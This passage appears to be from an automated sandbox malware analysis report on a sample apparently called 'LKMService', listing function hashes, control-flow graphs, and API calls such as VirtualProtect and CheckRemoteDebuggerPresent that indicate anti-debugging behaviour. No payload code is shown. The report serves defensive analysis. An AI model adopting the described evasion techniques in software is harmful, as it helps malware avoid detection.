                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5620c1f180cd770281888a6c4b87d47c6665bd22f7b7f990bd738f27cb8d19eb
                                                                                                                                                                                                                                            • Instruction ID: 4b7f62fe1276143ac3976e0b1c3a4ad532c6f99b452904b5f4716165e749ffbe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5620c1f180cd770281888a6c4b87d47c6665bd22f7b7f990bd738f27cb8d19eb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6B0121031114F5BCB44F38C810077EE1DEDFE8100F9890165086D7384EC109C019B22
                                                                                                                                                                                                                                            Function 04E34B1A Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 46a56c00207ca2e641735b1e9424607b61f1af031288974849c8098e89524979
                                                                                                                                                                                                                                            • Instruction ID: d09fd62413700eeb16d988a56231d12507e53b67a82dee14f7fa067aa9627e8b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46a56c00207ca2e641735b1e9424607b61f1af031288974849c8098e89524979
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAB012F0214417938A2929786E4553238C70B22635304EF461439FD0F8D680D970644E
                                                                                                                                                                                                                                            Function 04E3305A Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c6f0ff05225b26d147f791f1377c99cbe498de3fcb39536ce927f4c78b6a2c55
                                                                                                                                                                                                                                            • Instruction ID: b3c6b72f97f7f85d42e0a79d958745fb4cc5d08795eceb2a761575d5166fd492
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6f0ff05225b26d147f791f1377c99cbe498de3fcb39536ce927f4c78b6a2c55
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAA0023A00105A86DF09FF28C5B5998B771FF8662CBE813A8C48D8E468CA35991DEA44

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 04E33570 Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: VrN
                                                                                                                                                                                                                                            • API String ID: 0-2406607219
                                                                                                                                                                                                                                            • Opcode ID: 44dad3b2304a4f215aca237a21da29e3e90f86ad09dc2b44a94189423685a7f6
                                                                                                                                                                                                                                            • Instruction ID: d90423672c1138d356e6683b05310d2cc89e6f1f46049b890a9ea1c87a903efd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44dad3b2304a4f215aca237a21da29e3e90f86ad09dc2b44a94189423685a7f6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECB10270B14160CBCB16CF69C594AAEFBF6AFC5315B14A92AE856DB768C230FC41CB40
                                                                                                                                                                                                                                            Function 04E32448 Relevance: .3, Instructions: 289COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bb6e0c3bdb286a430f404e053aaa00edb7625b610035c3645f45ad694a055895
                                                                                                                                                                                                                                            • Instruction ID: 727b8c4f6df79faedab04e2fa5814f3b311bd7436f25badbe9827864d7636768
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb6e0c3bdb286a430f404e053aaa00edb7625b610035c3645f45ad694a055895
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12B11630B142558BCB16CF29D98497EFBF2AFC5305B14A9AAE196DB754D630FD40CB80
                                                                                                                                                                                                                                            Function 04E32438 Relevance: .3, Instructions: 286COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c4c4cdb2d7b9080513b55e454bdba72f60a67fde0c48f3001c0e3ece7732e31c
                                                                                                                                                                                                                                            • Instruction ID: 01a492393bce9ca86bc56476b1160e7758ce052030bbaa81d2b7f3a42ed85e44
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4c4cdb2d7b9080513b55e454bdba72f60a67fde0c48f3001c0e3ece7732e31c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BB11630B142558BCB16CF29D9849BEFBF2AFC5315B14A9AAD186DB764D630FD40CB80
                                                                                                                                                                                                                                            Function 04E33560 Relevance: .3, Instructions: 286COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 615cdd25e212b602494e129fc13866f0e304b10885d913c2d365c400c6322384
                                                                                                                                                                                                                                            • Instruction ID: 2c63a09728ebf2868c40ccbb03f2a8188d239cc5ace91a8b4e4b2b56a896eea2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 615cdd25e212b602494e129fc13866f0e304b10885d913c2d365c400c6322384
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5B10270B14260CFC716CF69C594AAEFBF6AFC5315B14A92AE456DB668C630FC41CB40
                                                                                                                                                                                                                                            Function 04E32C88 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: cd398965f00e7265e389f007dbd45b7b76eb132fcf937edb74870d2a730766e9
                                                                                                                                                                                                                                            • Instruction ID: 2d32ccc48cbd4494fee53790993584b4a598dae4645434577f49e1f2206c9f73
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd398965f00e7265e389f007dbd45b7b76eb132fcf937edb74870d2a730766e9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38A1E170B142148BCB16CF69C58497EFBF2AFC5301B1899AAE496DB364D634FC41CB51
                                                                                                                                                                                                                                            Function 04E32C78 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4c65419e71a0f36e56c438c4cd1feae30bf166601904d63caddda9c8797d972e
                                                                                                                                                                                                                                            • Instruction ID: cd22e56c2ddf3fa42c504985fdb7f9e12ee10edcccc0e1b949ead494d557fd3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c65419e71a0f36e56c438c4cd1feae30bf166601904d63caddda9c8797d972e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64A1D170B142248BCB16CF69C58496EFBF2AFC5301B1899AAE496DB3A4D734FC41DB50
                                                                                                                                                                                                                                            Function 04E32898 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b5e0ef02611aa24fed59504c63797e8d62637bede2c0ee72bcae29c315bf0e82
                                                                                                                                                                                                                                            • Instruction ID: 07b910263b4e4fc4a334a87542c35eddf04f3193e1837415e576a03f70da15e1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5e0ef02611aa24fed59504c63797e8d62637bede2c0ee72bcae29c315bf0e82
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EA1D130B042148BCB16CF29D4955AEFBF2EFC5302B1499AAE196EB265D730FC40CB50

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:29.4%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:50
                                                                                                                                                                                                                                            Total number of Limit Nodes:3
                                                                                                                                                                                                                                            execution_graph 9524 17fbf78 9534 17fbf8c 9524->9534 9525 17fbfc4 9534->9525 9535 58b12ab 9534->9535 9540 58b0eb5 9534->9540 9544 58b1237 9534->9544 9551 58b1b91 9534->9551 9555 58b13e1 9534->9555 9559 58b1203 9534->9559 9563 58b0b0f 9534->9563 9567 58b1479 9534->9567 9536 58b123b 9535->9536 9537 58b12b2 9535->9537 9536->9535 9571 17f6c08 9536->9571 9574 17f6bd0 9536->9574 9542 17f6c08 VirtualProtect 9540->9542 9543 17f6bd0 VirtualProtect 9540->9543 9541 58b0ec5 9542->9541 9543->9541 9545 58b123b 9544->9545 9547 17f6c08 VirtualProtect 9544->9547 9548 17f6bd0 VirtualProtect 9544->9548 9546 58b12b2 9545->9546 9549 17f6c08 VirtualProtect 9545->9549 9550 17f6bd0 VirtualProtect 9545->9550 9547->9545 9548->9545 9549->9545 9550->9545 9553 17f6c08 VirtualProtect 9551->9553 9554 17f6bd0 VirtualProtect 9551->9554 9552 58b1ba5 9553->9552 9554->9552 9557 17f6c08 VirtualProtect 9555->9557 9558 17f6bd0 VirtualProtect 9555->9558 9556 58b13f2 9557->9556 9558->9556 9561 17f6c08 VirtualProtect 9559->9561 9562 17f6bd0 VirtualProtect 9559->9562 9560 58b1217 9561->9560 9562->9560 9565 17f6c08 VirtualProtect 9563->9565 9566 17f6bd0 VirtualProtect 9563->9566 9564 58b0b1f 9565->9564 9566->9564 9569 17f6c08 VirtualProtect 9567->9569 9570 17f6bd0 VirtualProtect 9567->9570 9568 58b148c 9569->9568 9570->9568 9572 17f6c50 VirtualProtect 9571->9572 9573 17f6c8a 9572->9573 9573->9536 9575 17f6beb VirtualProtect 9574->9575 9576 17f6be5 9574->9576 9578 17f6c8a 9575->9578 9576->9536 9578->9536 9579 17f1478 9580 17f14c0 VirtualProtect 9579->9580 9581 17f14fa 9580->9581 9582 17f1398 9583 17f13dc CheckRemoteDebuggerPresent 9582->9583 9584 17f141e 9583->9584

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 017F1398 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 69 17f1398-17f141c CheckRemoteDebuggerPresent 71 17f141e-17f1424 69->71 72 17f1425-17f1460 69->72 71->72
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 017F140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4576314706.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_17f0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: e0fb87bce795de9a3bbbbe12b88e5e8ddb3d097aeb6cd4c0fdaabc6d992306b5
                                                                                                                                                                                                                                            • Instruction ID: f326f05dfe11da5ac563979a08a255d0626183c3b11356e1a1dcbe4d45ed5c98
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0fb87bce795de9a3bbbbe12b88e5e8ddb3d097aeb6cd4c0fdaabc6d992306b5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B2148B1800259CFDB00CF9AD884BEEFBF4AF49310F14846AE554A7340D738A944CF61
                                                                                                                                                                                                                                            Function 058B89D0 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 194 58b89d0-58b89d2 195 58b8c73-58b8c8c 194->195 196 58b89d3-58b89d8 194->196 218 58b8c94-58b8c9a 195->218 196->195 197 58b8c48-58b8c6a 196->197 198 58b8a2e-58b8a47 call 58b2c88 196->198 199 58b8c0e-58b8c13 196->199 200 58b8c6c-58b8c71 196->200 201 58b8a83-58b8a93 196->201 202 58b8b62-58b8b6b 196->202 203 58b8b82-58b8b89 196->203 204 58b8c01-58b8c09 196->204 205 58b8bc0-58b8bd0 196->205 206 58b8c25 196->206 207 58b8ba4-58b8bad 196->207 208 58b8b1b-58b8b20 196->208 209 58b8b3b-58b8b53 196->209 210 58b8ab9-58b8ad8 196->210 211 58b8a18-58b8a2c 196->211 212 58b89b8 196->212 213 58b89df-58b89e1 196->213 214 58b8bdf-58b8bfc call 58b2898 196->214 215 58b8add-58b8aef 196->215 216 58b8b55-58b8b60 196->216 217 58b8bd5-58b8bda 196->217 196->218 219 58b8af4 196->219 222 58b8c2a-58b8c3f 197->222 251 58b8a4e-58b8a50 198->251 199->195 200->218 232 58b8a9a-58b8ab4 201->232 233 58b8a95 201->233 225 58b8b71-58b8b7d 202->225 226 58b8c15-58b8c1f 202->226 228 58b8b8b-58b8b90 203->228 229 58b8b92 203->229 221 58b8af9-58b8b0e 204->221 205->221 206->222 230 58b8baf-58b8bb4 207->230 231 58b8bb6 207->231 250 58b8b28-58b8b39 208->250 209->221 220 58b89bd-58b89cf 210->220 211->220 212->220 223 58b896e-58b8974 213->223 224 58b89e2-58b89e9 213->224 214->221 215->220 216->221 217->195 219->221 220->194 221->199 236 58b8b14 221->236 222->200 238 58b8c41 222->238 248 58b89eb-58b8a02 224->248 225->221 226->206 243 58b8b97-58b8b9f 228->243 229->243 244 58b8bbb 230->244 231->244 232->220 233->232 236->197 236->199 236->200 236->202 236->203 236->204 236->205 236->206 236->207 236->208 236->209 236->214 236->216 236->217 236->219 238->197 238->200 238->206 243->221 244->221 252 58b8a0b-58b8a16 248->252 250->221 253 58b8a58-58b8a68 251->253 252->220 254 58b8a6a-58b8a6f 253->254 255 58b8a71 253->255 256 58b8a76-58b8a7e 254->256 255->256 256->220
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                                                            • API String ID: 0-3993045852
                                                                                                                                                                                                                                            • Opcode ID: 7de4023e78ba96583c8d95c29822e358ac5bef67f82e39e3047cebacd03052f4
                                                                                                                                                                                                                                            • Instruction ID: 518364d374804a421bc27c0d3403908bb22fc94c0514bb1c83dd8a59b4443b44
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7de4023e78ba96583c8d95c29822e358ac5bef67f82e39e3047cebacd03052f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F981C0B5B04259CFEB44CFA8C4909DDBBBABF89224B148556D802EB365CB70DC41CF55
                                                                                                                                                                                                                                            Function 058BC199 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6095c8bc69c0fcdfd35c78feeb331cf5eec45b120b89c593ae4c8662b5f023fa
                                                                                                                                                                                                                                            • Instruction ID: 6dd22b44f256d696cc8baab02e0aa5c1cd79e3bf67c30ad7c7ba2ff0af5abada
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6095c8bc69c0fcdfd35c78feeb331cf5eec45b120b89c593ae4c8662b5f023fa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37A18371B0420ACFEB14CFA9C5819ADBBB6BB89314F65866AD805EB352C770DE41CF41
                                                                                                                                                                                                                                            Function 058B65F0 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: cc29299e118d3347cd97f015aea1c09e81ab9a31fb35f022f923d3b6ce712e92
                                                                                                                                                                                                                                            • Instruction ID: f9479c4a4f528050fd8d718ed899786803ed157e0f1c8ed2581dd694f5ffe7d6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc29299e118d3347cd97f015aea1c09e81ab9a31fb35f022f923d3b6ce712e92
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F716971A042098FEB05CE69C540ADDBBFAFB8E320F1845A2E811EB350E7709D558B61
                                                                                                                                                                                                                                            Function 058B6960 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e3be7306a2da3579804ead4ec48349a7ac121303b8c06be5e44872e3770a2b13
                                                                                                                                                                                                                                            • Instruction ID: 75e98b95c013a1c1a534a3221e6e7a2aeeb5345071baba06b62017d46a8113f5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3be7306a2da3579804ead4ec48349a7ac121303b8c06be5e44872e3770a2b13
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33618A71A04209CFEB05CF6DC540AECBBF6BB8A320F1845A2E811EB361E774DD518B61
                                                                                                                                                                                                                                            Function 058B8415 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1f022d1068aef2cd9a5b0cb549b551568e3717ee26e7511136f8633fc9d06f8c
                                                                                                                                                                                                                                            • Instruction ID: 524507bbcd12ca4938fafa07094d086dabe47bfbc7e92d322159b6a567925109
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f022d1068aef2cd9a5b0cb549b551568e3717ee26e7511136f8633fc9d06f8c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A51E670B1424A8FEB04CF78D4506EEBBFAFB89200F14852AD856EB351DB70ED458B52
                                                                                                                                                                                                                                            Function 058B7D27 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 475d03c350dba3af9d1a8ed5341df19f1578597acb09b4390a162054fdd90ec1
                                                                                                                                                                                                                                            • Instruction ID: 9e65af13943f32a2609af90493d3d5269c5503a023e79573642b254272ef52fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 475d03c350dba3af9d1a8ed5341df19f1578597acb09b4390a162054fdd90ec1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67510231B042058FEB24CF38C8409EABBF7EBD9750B18855AE886EB359D671ED058B51
                                                                                                                                                                                                                                            Function 058B8F3A Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4151b50389d91dc951eaf86e56288ce1525a084b82a2657717a061b64352d911
                                                                                                                                                                                                                                            • Instruction ID: fb514a1070a598591bb982ef7bb5b53d694e92568dbf134d90f39e4785cef16a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4151b50389d91dc951eaf86e56288ce1525a084b82a2657717a061b64352d911
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B515931A0420ACFEB05CF68C5809DDBBFBAF89214F198592E945EB362D671DD85CF21
                                                                                                                                                                                                                                            Function 058B42E0 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 318128bd6abead6e26637509ec5a336bfd7da7271c6f7767109f4779ae4995c7
                                                                                                                                                                                                                                            • Instruction ID: a840cba78d9dc9b3d80f4f98188b5af272061d89cf80283ad52d041fa4b25f9f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 318128bd6abead6e26637509ec5a336bfd7da7271c6f7767109f4779ae4995c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7851C235E14119CFEF14CFA8C481AADBBB7EB89314B248566D916EB362CB719D12CB40
                                                                                                                                                                                                                                            Function 058B7D38 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 90f554076f6d6548ae780c16d834e66d5245eceb516c7b9cb0b9fada42aa577e
                                                                                                                                                                                                                                            • Instruction ID: 562bad60b10f2c638f077e919af9f0ced5c6b9109225cbc0b9d6c79a34df6e41
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90f554076f6d6548ae780c16d834e66d5245eceb516c7b9cb0b9fada42aa577e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9510431B042058FEB14CF79C8405EABBF7EFC9650B18855AE886EB358D771ED058B51
                                                                                                                                                                                                                                            Function 058B2230 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
